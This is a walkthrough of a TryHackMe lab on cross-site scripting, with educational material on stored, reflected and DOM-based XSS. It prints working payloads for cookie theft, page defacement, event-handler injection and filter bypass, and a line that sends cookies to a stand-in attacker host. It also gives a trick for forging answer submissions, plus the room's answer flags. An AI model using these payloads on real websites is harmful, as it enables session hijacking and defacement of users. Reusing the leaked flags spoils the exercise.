[Task 1] Introduction
Cross-site scripting (XSS) is a security vulnerability typically found in web applications. Its a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victims machine.
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. TryHackMe Cross Site Scripting - A Walkthrough by Kumar Atul Jaiswal
The extent to the severity of this vulnerability depends on the type of XSS, which is normally split into two categories: persistent/stored and reflected. Depending on which, the following attacks are possible:
- Cookie Stealing - Stealing your cookie from an authenticated session, allowing an attacker to login as you without themselves having to provide authentication.
- Keylogging - An attacker can register a keyboard event listener and send all of your keystrokes to their own server.
- Webcam snapshot - Using HTML5 capabilities its possible to even take snapshots from a compromised computer webcam.
- Phishing - An attacker could either insert fake login forms into the page, or have you redirected to a clone of a site tricking you into revealing your sensitive data.
- Port Scanning - You read that correctly. You can use stored XSS to scan an internal network and identify other hosts on their network.
- Other browser based exploits - There are millions of possibilities with XSS.
Who knew this was all possible by just visiting a web-page. There are measures put in place to prevent this from happening by your browser and anti-virus.
This room will explain the different types of cross-Site scripting, attacks and require you to solve challenges along the way.
This room is for educational purposes only, carrying out attacks explained in this room without permission from the target is illegal. I take no responsibility for your actions, you need to learn how an attacker can exploit this vulnerability in order to ensure you're patching it properly.
[Task 2] Deploy your XSS Playground
Attached to this task is a machine used for all questions in this room. Every task in this room has an page on the XSS Playground site, which includes a more in-depth explanation of the vulnerability in question and supporting challenges.
[Task 3] Stored XSS
Stored cross-site scripting is the most dangerous type of XSS. This is where a malicious string originates from the websites database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.
An example
The payload could be as simple as <script>alert(1)</script>
However, this payload wont just execute in your browser but any other browsers that display the malicious data inserted into the database.
Lets experiment exploiting this type of XSS. navigate to the "Stored-XSS" page on the XSS playground.
#1 The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.
Doing so will reveal the answer to this question.
Payload :- <p>HEY, it's HTML!!</p>
Ans :- HTML_T4gs
#3 Create an alert popup box appear on the page with your document cookies.
Payload :- <script>alert(document.cookie)</script>
Ans :- W3LL_D0N3_LVL2
#4 Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.
Payload :- <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>
Ans :- websites_can_be_easily_defaced_with_xss
<script>window.location='http://attacker/?cookie='+document.cookie</script>
This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.
Take over Jack's account by stealing his cookie, what was his cookie value?
Payload :- <img src="javascript:'/log/' + document.cookie" />
Ans :- s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE
#6 Post a comment as Jack.
ANs :- c00ki3_stealing
[Task 4] Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
This might seem harmless as it requires the victim to send a request containing an attackers payload, and a user wouldn't attack themselves. However, attackers could trick the user into clicking their crafted link that contains their payload via social-engineering them via email..
Reflected XSS is the most common type of XSS attack.
An example
The website then includes this malicious payload from the request in the response to the user. The victims browser will execute the payload inside the response. The data the script gathered is then sent back to the attacker (it might not necessarily be sent from the victim, but to another website where the attacker then gathers this data - this protects the attacker from directly receiving the victims data).
#1 Craft a reflected XSS payload that will cause a popup saying "Hello"
Payload :- <script>alert("Hello")</script>
Ans :- ThereIsMoreToXSSThanYouThink
Payload :- <script>alert(window.location.hostname)</script>
Ans :- ReflectiveXss4TheWin
[Task 5] DOM-Based XSS
What is the DOM
In a DOM-based XSS attack, a malicious payload is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. So what does this mean?
With reflective xss, an attackers payload will be injected directly on the website and will not matter when other Javascript on the site gets loaded.
<html>
You searched for <em><script>...</script></em>
</html
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>
#1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
The hint gives us something to try out.
test" onmouseover="alert('Hover over the image and inspect the image element')
What this is doing is applying test to the src attribute of the image tag, and closing that quote. Then it is starting an onmouseover event attribute. When we do this and mouse over the broken image, then we see the alert.
Let's modify it and make it do what the task is asking for (document.cookie instead of that string):
xxx" onmouseover="alert(document.cookie)
That should give us the desired result. We could have chosen a number of different events rather than onmouseover. I personally prefer onerror for this example. Give it a try!
Ans :- BreakingAnElementsTag
xxx" onhover="document.body.style.backgroundColor='red'
You might have to play around with this one, it's a bit buggy for me. I had to end up doing it with an onmouseover I think. Play around and you'll eventually get it.
[Task 6] Using XSS for IP and Port Scanning
Cross-site scripting can be used for all sorts of mischief, one being the ability to scan a victims internal network and look for open ports. If an attacker is interested in what other devices are connected on the network, they can use Javascript to make requests to a range of IP addresses and determine which one responds.
On the XSS Playground, go to the IP/Port scanning tab and review a script to scan the internal network.
[Task 7] XSS Keylogger
Javascript can be used for many things, including creating an event to listen for key-presses.
Navigate to the "Key Logger" part of the XSS playground and complete the challenge.
[Task 8] Filter Evasion
There are many techniques used to filter malicious payloads that are used with cross-site scripting. It will be your job to bypass 4 commonly used filters.
Navigate to "Filter Evasion" in the XSS Playground to get started.
Cross-site scripting are extremely common. Below are a few reports of XSS found in massive applications; you can get paid very well for finding and reporting these vulnerabilities.
XSS found in Shopify
$7,500 for XSS found in Steam chat
$2,500 for XSS in HackerOne
XSS found in Instagram
#1 Bypass the filter that removes any script tags.
Payload :- <img src="blah" onerror=alert("Hello") />
Ans :- 3c3cf8d90aaece81710ab9db759352c0
Payload :- <img src="blah" onerror=confirm("Hello") />
Ans :- a2e5ef66f5ff584a01d734ef5edaae91
Payload :- <img src="blah" onerror=alert("HHelloello") />
Ans :- decba45d0eff17c6eedf1629393bee1d
word "Hello"
script
onerror
onsubmit
onload
onmouseover
onfocus
onmouseout
onkeypress
onchange
<img src="blah" ONERROR="alert('HHelloello')" />
I'll let you in on a secret. This section is all being evaluated by POSTing values for question and answer to /filter-evasion-check. If you simply POST question=1&answer=Hello to /filter-evasion-check, you can fool the server-side code into returning the valid answer flag.
POST question=1&answer=Hello
POST question=2&answer=prompt
POST question=4&answer=Hello
POST question=4&answer=Hello
[Task 9] Protection Methods & Other Exploits
Protection Methods
Disclaimer
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!
All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)